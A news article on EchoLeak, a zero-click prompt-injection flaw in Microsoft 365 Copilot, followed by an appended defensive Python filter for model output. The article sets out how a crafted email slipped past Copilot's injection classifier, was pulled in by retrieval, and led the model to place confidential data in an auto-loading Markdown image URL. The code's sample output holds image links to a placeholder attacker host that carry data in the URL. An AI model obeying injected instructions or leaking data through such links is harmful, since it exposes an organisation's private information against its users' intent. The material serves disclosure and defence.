Security researchers discover a zero-click vulnerability in Microsoft's AI

A new attack called EchoLeak is the first known zero-click vulnerability that allows attackers to exfiltrate sensitive data from Microsoft 365 Copilot without any interaction by the user.

The attack was developed by AIM Labs researchers in January 2025 and reported to Microsoft. The company assigned the identifier CVE-2025-32711 to this information disclosure flaw, rated it critical, and fixed it at the server level in May, so no action is required by users.

Microsoft has pointed out that there is no evidence it has been exploited, so no customer is affected.

Microsoft 365 Copilot is an AI assistant integrated into Office applications such as Word, Excel, Outlook and Teams. It uses OpenAI's GPT language models, as ChatGPT does, together with Microsoft Graph to help users generate content, analyze data and answer questions based on the internal files, emails and chats of the organization that is using it.

Although EchoLeak has been fixed and has not been used by malicious actors, it illustrates a new class of vulnerabilities that AIM Labs calls LLM Scope Violation. This type of flaw allows a language model to leak internal data without the user's intent or interaction.

Because it requires no interaction from the victim, the attack can be automated to perform silent data exfiltration in corporate environments, which demonstrates how dangerous these vulnerabilities can be in systems that integrate AI.

How EchoLeak works

The attack begins with a malicious email sent to the target. The message, which looks like an ordinary work email, contains a hidden prompt injection designed to instruct the language model to extract and send sensitive internal data.

Because the message is written as if it were a legitimate communication between people, it manages to evade Microsoft's defense mechanisms, such as the XPIA (cross-prompt injection attack) classifier. This is an automated system that detects possible attacks that try to inject malicious instructions into the text that Copilot analyzes.

Later, when the user asks Copilot a related question, the RAG (retrieval-augmented generation) engine, which is in charge of retrieving relevant information, files or chats that may be related to what the user asks, automatically pulls in the malicious email because of its format and its apparent relevance to the user's request.

At that point, the malicious injection reaches the model and tricks it into extracting confidential information and inserting it into a fraudulent link, to an image that does not exist, whose function is to exfiltrate that data.

The last step has to do with Markdown, a very basic formatting language used to style text in a simple way. It also allows, for example, inserting images or links with a very simple syntax.

When a system, Copilot in this case, generates that kind of text, the browser always treats the (fake) image as something it must load from the indicated web address. That load happens automatically, without the user clicking anything. In doing so, it sends the information embedded in the URL to the attacker's server.
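
One way a defender can close the auto-loading image channel described above is to filter model output before it is rendered. This is an added example, not code from the article, Microsoft or the researchers; the allowlisted host, the function names and the sample output are assumptions constructed for illustration. It goes beyond the text by also handling reference-style image definitions, which Markdown allows alongside the inline form.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host the chat client may auto-load images from.
ALLOWED_IMAGE_HOSTS = {"res.contoso.example"}

# Inline image: ![alt](url "optional title")
INLINE_IMG = re.compile(r'!\[([^\]]*)\]\([ \t]*<?([^)\s>]+)>?[^)]*\)')
# Reference definition: [label]: url  (the target of ![alt][label])
REF_DEF = re.compile(r'^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)

def host_allowed(url, allowed=ALLOWED_IMAGE_HOSTS):
    """Only absolute https URLs on an allowlisted host may be fetched."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme == "https" and (parts.hostname or "") in allowed

def sanitize_model_output(markdown, allowed=ALLOWED_IMAGE_HOSTS):
    """Return (safe_markdown, blocked_urls) for text generated by the model."""
    blocked = []

    def drop_inline(match):
        alt, url = match.group(1), match.group(2)
        if host_allowed(url, allowed):
            return match.group(0)
        blocked.append(url)
        return f"[image removed: {alt or 'untitled'}]"

    def drop_ref(match):
        if host_allowed(match.group(2), allowed):
            return match.group(0)
        blocked.append(match.group(2))
        return ""  # with no definition, ![alt][label] renders as plain text

    out = INLINE_IMG.sub(drop_inline, markdown)
    return REF_DEF.sub(drop_ref, out), blocked

# Constructed sample of model output; hosts and values are made up.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![logo](https://res.contoso.example/logo.png)\n"
    "![status](https://collector.attacker.example/p.png?d=Q3-draft)\n"
    "![chart][r1]\n\n"
    "[r1]: https://collector.attacker.example/c.png?d=internal-notes\n"
)
if __name__ == "__main__":
    print(sanitize_model_output(SAMPLE))
```

The returned list of blocked URLs can be logged as a detection signal. Dropping a reference definition also disables reference-style links to the same non-allowlisted host, which is the conservative choice here.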